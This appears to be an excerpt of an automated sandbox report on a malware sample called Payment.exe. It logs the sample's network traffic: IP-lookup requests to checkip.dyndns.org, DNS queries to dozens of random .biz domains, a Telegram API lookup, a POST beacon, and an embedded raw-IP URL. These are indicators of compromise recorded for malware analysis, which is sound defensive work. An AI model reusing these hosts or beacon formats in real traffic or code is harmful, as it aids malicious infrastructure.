                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /ccoms?usid=27&utid=12022910001 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
                  Source: global trafficHTTP traffic detected: GET /qvxayygldfupog?usid=27&utid=12022910102 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww7.fwiwk.biz
                  Source: global trafficHTTP traffic detected: GET /wjuw?usid=27&utid=12022910910 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Host: ww12.fwiwk.biz
                  Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
                  Source: global trafficDNS traffic detected: DNS query: pywolwnvd.biz
                  Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
                  Source: global trafficDNS traffic detected: DNS query: ssbzmoy.biz
                  Source: global trafficDNS traffic detected: DNS query: cvgrf.biz
                  Source: global trafficDNS traffic detected: DNS query: npukfztj.biz
                  Source: global trafficDNS traffic detected: DNS query: przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: ww7.przvgke.biz
                  Source: global trafficDNS traffic detected: DNS query: zlenh.biz
                  Source: global trafficDNS traffic detected: DNS query: knjghuig.biz
                  Source: global trafficDNS traffic detected: DNS query: uhxqin.biz
                  Source: global trafficDNS traffic detected: DNS query: anpmnmxo.biz
                  Source: global trafficDNS traffic detected: DNS query: www.anpmnmxo.biz
                  Source: global trafficDNS traffic detected: DNS query: lpuegx.biz
                  Source: global trafficDNS traffic detected: DNS query: api.telegram.org
                  Source: global trafficDNS traffic detected: DNS query: vjaxhpbji.biz
                  Source: global trafficDNS traffic detected: DNS query: xlfhhhm.biz
                  Source: global trafficDNS traffic detected: DNS query: ifsaia.biz
                  Source: global trafficDNS traffic detected: DNS query: saytjshyf.biz
                  Source: global trafficDNS traffic detected: DNS query: vcddkls.biz
                  Source: global trafficDNS traffic detected: DNS query: fwiwk.biz
                  Source: global trafficDNS traffic detected: DNS query: tbjrpv.biz
                  Source: global trafficDNS traffic detected: DNS query: deoci.biz
                  Source: global trafficDNS traffic detected: DNS query: gytujflc.biz
                  Source: global trafficDNS traffic detected: DNS query: qaynky.biz
                  Source: global trafficDNS traffic detected: DNS query: bumxkqgxu.biz
                  Source: global trafficDNS traffic detected: DNS query: dwrqljrr.biz
                  Source: global trafficDNS traffic detected: DNS query: nqwjmb.biz
                  Source: global trafficDNS traffic detected: DNS query: ytctnunms.biz
                  Source: global trafficDNS traffic detected: DNS query: ww12.fwiwk.biz
                  Source: global trafficDNS traffic detected: DNS query: myups.biz
                  Source: global trafficDNS traffic detected: DNS query: oshhkdluh.biz
                  Source: global trafficDNS traffic detected: DNS query: yunalwv.biz
                  Source: global trafficDNS traffic detected: DNS query: jpskm.biz
                  Source: global trafficDNS traffic detected: DNS query: lrxdmhrr.biz
                  Source: global trafficDNS traffic detected: DNS query: wllvnzb.biz
                  Source: global trafficDNS traffic detected: DNS query: gnqgo.biz
                  Source: global trafficDNS traffic detected: DNS query: jhvzpcfg.biz
                  Source: global trafficDNS traffic detected: DNS query: acwjcqqv.biz
                  Source: global trafficDNS traffic detected: DNS query: lejtdj.biz
                  Source: global trafficDNS traffic detected: DNS query: vyome.biz
                  Source: global trafficDNS traffic detected: DNS query: yauexmxk.biz
                  Source: global trafficDNS traffic detected: DNS query: iuzpxe.biz
                  Source: global trafficDNS traffic detected: DNS query: sxmiywsfv.biz
                  Source: global trafficDNS traffic detected: DNS query: vrrazpdh.biz
                  Source: global trafficDNS traffic detected: DNS query: ftxlah.biz
                  Source: global trafficDNS traffic detected: DNS query: typgfhb.biz
                  Source: global trafficDNS traffic detected: DNS query: esuzf.biz
                  Source: global trafficDNS traffic detected: DNS query: gvijgjwkh.biz
                  Source: global trafficDNS traffic detected: DNS query: qpnczch.biz
                  Source: global trafficDNS traffic detected: DNS query: brsua.biz
                  Source: global trafficDNS traffic detected: DNS query: dlynankz.biz
                  Source: unknownHTTP traffic detected: POST /uoiag HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 796
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 10 Apr 2025 16:09:59 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Thu, 10 Apr 2025 16:10:32 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:23 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:23 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:29 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:28 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:32 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Thu, 10 Apr 2025 16:11:35 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error pag
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 10 Apr 2025 16:11:47 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 10 Apr 2025 16:11:47 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 10 Apr 2025 16:11:49 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Thu, 10 Apr 2025 16:11:49 GMTContent-Length: 19Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
                  Source: Payment.exe, 00000008.00000002.2178910492.000000000702E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.213.51.196/msbflok
